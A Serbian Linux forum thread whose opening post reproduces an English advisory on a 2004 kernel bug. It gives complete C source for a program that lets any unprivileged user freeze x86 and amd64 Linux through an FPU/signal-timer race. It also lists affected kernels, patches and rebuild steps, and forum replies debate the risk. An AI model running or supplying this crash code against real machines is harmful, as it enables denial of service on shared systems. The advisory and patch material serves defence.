New Kernel Crash

1

New Kernel Crash

offline
  • Pridružio: 04 Jan 2004
  • Poruke: 179
  • Gde živiš: [NS]

The Evil Code

Running this simple C program crashes the Linux kernel.

crash.c.txt

  #include <sys/time.h>
  #include <signal.h>
  #include <unistd.h>
 
  static void Handler(int ignore)
  {
   char fpubuf[108];
   __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
   write(2, "*", 1);
   __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
  }
 
  int main(int argc, char *argv[])
  {
   struct itimerval spec;
   signal(SIGALRM, Handler);
   spec.it_interval.tv_sec=0;
   spec.it_interval.tv_usec=100;
   spec.it_value.tv_sec=0;
   spec.it_value.tv_usec=100;
   setitimer(ITIMER_REAL, &spec, NULL);
   while(1)
    write(1, ".", 1);
 
   return 0;
  }
 
 


This bug is confirmed to be present when the code is compiled with GCC version 2.96, 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel versions 2.4.2x and 2.6.x on x86 and amd64 systems.

The Crashing Kernels

Minor numbers are versions verified, this is just the top the iceberg:

* Linux 2.6.x
o 2.6.7-rc2
o 2.6.6 (vanilla)
o 2.6.6-rc1 SMP (varified by blaise)
o 2.6.6 SMP (verified by riven)
o 2.6.5-gentoo (verified by RatiX)
o 2.6.5-mm6 - (verified by Mariux)
o 2.6.5 (fedora core 2 vanilla)
o 2.6.3-13mdk (Mandrake)
* Linux 2.4.2x
o 2.4.26 vanilla
o 2.4.26, grsecurity 2.0 config
o 2.4.26-rc1 vanilla
o 2.4.26-gentoo-r1
o 2.4.22
o 2.4.22-1.2188 Fedora FC1 Kernel
o 2.4.20 RH7.3 (gcc 2.96)
o 2.4.18-bf2.4 (debian woody vanilla)

Even grsecurity-patched kernels crash. "I would have hoped that grsec would have blocked or logged something, but nothing appeared in the logs." Vincent

The safe kernels

This code does nothing but exit with the error message Floating point exception and can not do any damage to systems running

* Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
* Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
* Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
* Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
* Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
* 2.2.19-kernel

It is unclear why these specific Gentoo patch sets of the 2.4.26 kernel are safe. Other versions of the Gentoo kernel are not.

The user-mode Linux kernel 2.6.5-1um is safe. I assume this means other versions of user mode Linux are safe.

Linux Kernel 2.6.4 SMP with patches has been reported to be safe. Reporter uses a version patched with Con Kolivas Staircase scheduler (but it only affects to the task scheduler). Gcc version 3.3.3. "System did not crash, I left the crash program 10 minutes and after that i killed the task and I continued using my system". Guille

The glitch is verified present in Linux 2.5.6 SMP and Linux 2.6.6 SMP.

The bug is not present in 2.2.19, it seems this bug only affects 2.4 and later.

The threat

Using this exploit to crash Linux systems requires the (ab)user to have shell access or other means of uploading and running the program (like cgi-bin and FTP access). The program works on any normal user account, root access is not required. This exploit has been reported used to take down several "lame free-shell providers" servers (running code you know will damage a system intentionally and hacking in general is illegal in most parts of the world and strongly discouraged).

This code only works on x86 Linux machines. This code does not compile (makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This doesn't affect NetBSD Stable.

SMP systems can be compromised, but a separate instance of the program is required for each CPU before the system halts. Each instance of the program code will lock one CPU and this process can not be killed. If you have two CPUs the second instance of the program kills the entire machine.

Check your own system yourself if you are wondering if this affects you. Better safe than sorry. Assume it will crash, sync (even unmount) your file systems before testing. If your system is a production server with 1000 on line users then do not test this code on that box.

How to protect yourself

The last days were frustrating. Compiling a large number of different kernel versions just to find that gcc crash.c -o evil && ./evil halts the system is quite dull. I hoped some kernels would be unaffected because 2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernels versions die when evil is executed.

The Linux Kernel mailing list is found to the right of this article. You may find solutions there not mentioned on this page. The author does subscribe and plans to post (better) solutions here as they appear.

Patch for 2.4.2x Kernels

There are two patches available, both of them work with 2.4.xx kernels:

* 2.4.26_i387.h_patch.txt
* signal.c-2.4.26.patch.txt (signal.c-2.4.21.patch.txt)

2.4.26_i387.h_patch.txt is recommended. When this patch is applied evil will not do any damage, but it will keep running at 99% CPU until it is killed (like any other process). This is a general fix for root cause of the flaw evil exploits. The signal.c patch is more specific to evil and makes the program exit instantly. This approach works, but it is not a very beautiful solution.

Yours truly has tested both patches with Kernel versions 2.4.25 and 2.4.26, the signal.c patch is also tested with 2.4.21.

Follow these steps to get a safe vanilla kernel:

1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Download the latest kernel source, linux-2.4.26.tar.bz2, from your local Linux Kernel Mirror
3. Unpack the kernel source and make a symbolic link:
* cd /usr/src/
* tar xfvj linux-2.4.26.tar.bz2
* ln -s linux-2.4.26 linux
4. Download the patch for 2.4.26:
5. Apply the patch 2.4.26_i387.h_patch.txt
* patch -p1 -d /usr/src/linux-2.4.26 <2.4.26_i387.h_patch.txt
6. Configure and compile as usual.
* make dep bzImage modules modules_install
* mount /boot (some distributions mount /boot on startup)
* cp arch/i386/boot/bzImage /boot
* You may want to call your new kernel something else and edit Grub or Lilos configuration.

The patches should apply cleanly to other 2.4.xx versions.

Kernel 2.4.26-rc3-gentoo

2.4.26-rc3-gentoo (gentoo-sources-2.4.26_pre5.patch.bz2) is safe. This is a patch set for turning linux-2.4.25 -> 2.4.26-rc3-gentoo.

I have no idea why this kernel version is safe from this exploit. It just is. This kernel patch set returns Floating point exception instead of locking the system when evil is executed.

This kernel can be used on any Linux system. It does not require any Gentoo-only tools.

General advice: It is a bad idea to use kernels and patches from unknown sources. You should only use software from trusted sources. I know this patch set is safe ? you do not, and you should not take a strangers word when it comes to security.

1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2) aka 2.4.26_pre5:
* wget re.a.la/gs (2,2M)
4. Unpack the 2.4.25 kernel source:
* cd /usr/src/
* tar xfvj linux-2.4.25.tar.bz2
5. Apply the Gentoo patchset:
* patch -p1 -d /usr/src/linux-2.4.25 <gentoo-sources-2.4.26_pre5.patch
6. Rename the kernel and make a symlink from /usr/src/linux:
* mv linux-2.4.25 linux-2.4.26-rc3-gentoo
* ln -s linux-2.4.26-rc3-gentoo linux
7. The Makefile now refers to this kernel as -rc5-gentoo, but when you compile your kernel it claims to be 2.4.26-rc3-gentoo. I assume this is because the original Gentoo ebuild changed the version in the Makefile or another configuration file to make these match. Open the Makefile in your favorite editor and and change line 4 to say -rc3-gentoo:
* cd linux-2.4.26-rc3-gentoo
* nano -w Makefile
* "EXTRAVERSION = -rc5-gentoo" -> "EXTRAVERSION = -rc3-gentoo"
8. Configure your kernel
* Using your old config: cp /usr/src/linux-oldversion/.config .config && make oldconfig
* The Linux kernel can be configured with make menuconfig (CLI) and make xconfig (GUI)
9. Compile your new kernel and install as usual:
* make dep bzImage modules modules_install
* mount /boot (some distributions mount /boot on startup)
* cp arch/i386/boot/bzImage /boot
* You may want to call your new kernel something else and edit Grub or Lilos configuration.

Congratulations. You are now running the 2.4.26-rc3-gentoo kernel.

2.6.xx kernels

A patch for i387.h (2.6.7-rc3-bk5_i387.h.patch.txt) included in kernel 2.6.7-rc3-bk5 has been tested successfully on 2.6.5 and 2.6.7-rc3 by Marc Ballarin

It is tested successfully on Linux-2.6.7-rc2 by yours truly.

The i387.h patch seems to be the best solution. When evil is executed it does not freeze the system, but unlike the other alternative patches it does leave evil running at 99.9% CPU. It can be stopped with ctrl-c, kill and killall.

1. Read the Kernel Rebuild Guide if this is your first time compiling your own kernel
2. Get a kernel from kernel.org and unpack it to /usr/src
3. Get 2.6.7-rc3-bk5_i387.h.patch.txt
4. patch -p1 -d /usr/src/linux-2.6.7-rc2 <2.6.7-rc3-bk5_i387.h.patch.txt
5. Follow the usual steps.

Other solutions:

* Andi Kleen has posted a patch for linux-2.6.7rc3 in the linux-kernel mail list available at
o PATCH fix for Re: timer + fpu stuff locks my console race.
o lkml.org/lkml/2004/6/12/88
o Raw message: andi_kleen_patch.txt
* Stian Skjelstad's patch also works with 2.6.7
o lkml.org/lkml/2004/6/12/64
* Sergey Vlasov has a solution at
o lkml.org/lkml/2004/6/12/81

amd64

IMPORTANT: amd64 is affected as well.

The fix is the same as on x86 (it's included in 2.6.7-rc3-bk6). The file that needs the change is include/asm-x86_64/i387.h Ballarin Marc

Fedora Core 2

Red Hat has now released a patched kernel for Fedora Core 2. (Fedora Update Notification FEDORA-2004-171 2004-06-14)

sudo yum -y update kernel*

will upgrade your kernel to the safe Version : 2.6.6, Release : 1.435.

Bug reports

* The exploit was reported as gcc bug 15905 2004-06-09.
* This is reported to the linux-kernel list with the subject timer + fpu stuff locks my console race.
* Reported to Gentoo Bugzilla as bug 53804



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
offline
  • Pridružio: 18 Apr 2003
  • Poruke: 550

Ovo je strasno, bez root access-a...



offline
  • Pridružio: 04 Jan 2004
  • Poruke: 179
  • Gde živiš: [NS]

Da da, obican User moze da ga ubije!

offline
  • mr_W 
  • Počasni građanin
  • Pridružio: 22 Mar 2004
  • Poruke: 835

Pa da.. ali zasto bi uopste davao bilo kakvog usera nekome ko bi hteo da mi ubije mashinu ?

Razumljivo je da postoje slucajevi kada se shell daje raznim nepoznatim likovima, ali vecim delom dajes shell nekome kome je takodje u interesu da mashina funkcionise besprekorno..

Tako da, ne gledam na to kao na nesto fatalno.

offline
  • AxeZ 
  • Legendarni građanin
  • Pridružio: 17 Apr 2003
  • Poruke: 3989
  • Gde živiš: Novi Sad, Vojvodina

Pa sam cinjenica da moras imati nalog na toj masini umnogome sprecava 99,999999999% malicioznih korisnika.

offline
  • Pridružio: 18 Apr 2003
  • Poruke: 550

Stvar je u tome sto ovo veoma podseca na one win situacije, kad ti neko dodje da instalira igru, a ostavi ti virus ili trojana; znaci, ako ima fizicki pristup masini, moze da uradi sta hoce. Dosad je trebalo imati root access, pa iskoristiti neku ranjivost, sto je podrazumevalo ipak neko znanje, sad ja dodjem kod AxeZa, i dok on kuva kafu, ja mu skrkam masinu, i posle pricam - onaj Slack, koje sranje Wink.

offline
  • AxeZ 
  • Legendarni građanin
  • Pridružio: 17 Apr 2003
  • Poruke: 3989
  • Gde živiš: Novi Sad, Vojvodina

BrainkillA ::Stvar je u tome sto ovo veoma podseca na one win situacije, kad ti neko dodje da instalira igru, a ostavi ti virus ili trojana; znaci, ako ima fizicki pristup masini, moze da uradi sta hoce. Dosad je trebalo imati root access, pa iskoristiti neku ranjivost, sto je podrazumevalo ipak neko znanje, sad ja dodjem kod AxeZa, i dok on kuva kafu, ja mu skrkam masinu, i posle pricam - onaj Slack, koje sranje Wink.

Ma daj, nema to veze..
Postoje local root exploiti koji rade sa user naloga vec deceniju samo sto je problem sto su "local".
Znaci moras imatio pristup masini.
Opasniji su oni drugi, remote root exploiti, e oni dozvoljavaju svakom deristu da ti slebe stvari ako zna da kompajlira exploit.
Na svu srecu vecina njih je glupa da ga kompajlira a oni koji nisu toliko glupi obicno i kad ga kompajliraju tesko ga zloupotrebljavaju jer je pisac exploita u svojoj 133t-nosti namerno pojebao shell code.
Nije ovo uvek slucaj ali dosta puta jeste.

Znaci ovo ni ne da root dozvole koliko sam primetio akernel je sigurno vec patchovan na ovaj bag tako da ja ne brinem mnogo.

E da, i ko dodje do AxeZa na kahfu mora imati u vidu da ne sme ceprkati po Axezovim kompjuterima iz jednog prostog razloga.......AxeZ je osvetoljubiv...Smile

offline
  • Pridružio: 18 Apr 2003
  • Poruke: 550

Ne kazem da je smak sveta, ali mi evocira ruzne uspomene na win dane Wink, that's all. I jos ce posle neko od onih mojih ortaka morona za racunare da mi prica : "brate, izas'o virus za linoks Wink

offline
  • AxeZ 
  • Legendarni građanin
  • Pridružio: 17 Apr 2003
  • Poruke: 3989
  • Gde živiš: Novi Sad, Vojvodina

BrainkillA ::Ne kazem da je smak sveta, ali mi evocira ruzne uspomene na win dane Wink, that's all. I jos ce posle neko od onih mojih ortaka morona za racunare da mi prica : "brate, izas'o virus za linoks Wink

Ma nema sta da evocira....prvo to nemoze da se razmnozava, drugo ne desava se privilege escalation, znaci ne dobijes root-a. Ovo je obican DOS napad na kernel za koji moras biti pored kompjutera ( ili preko ssh-a ) , imati nalog na njemu i nadati se da kernel nije patchovan.

offline
  • Pridružio: 18 Apr 2003
  • Poruke: 550

Objasni ti to budalama, that's all I'm saying... Jasno mi je da ovih dvadeset linija koda nisu virus Smile .

Ko je trenutno na forumu
 

Ukupno su 1159 korisnika na forumu :: 30 registrovanih, 7 sakrivenih i 1122 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: A.R.Chafee.Jr., Asparagus, bokisha253, CikaKURE, danilopu, dijica, Dorcolac, FOX, Frunze, Georgius, ikan, ivan1973, Karla, Kriglord, Kubovac, Lieutenant, Magistar78, mercedesamg, Milos82, Misirac, mkukoleca, NoOneEver Dreams, nuke92, pein, raptorsi, Trpe Grozni, Vlada78, vladaa012, wolf431, |_MeD_|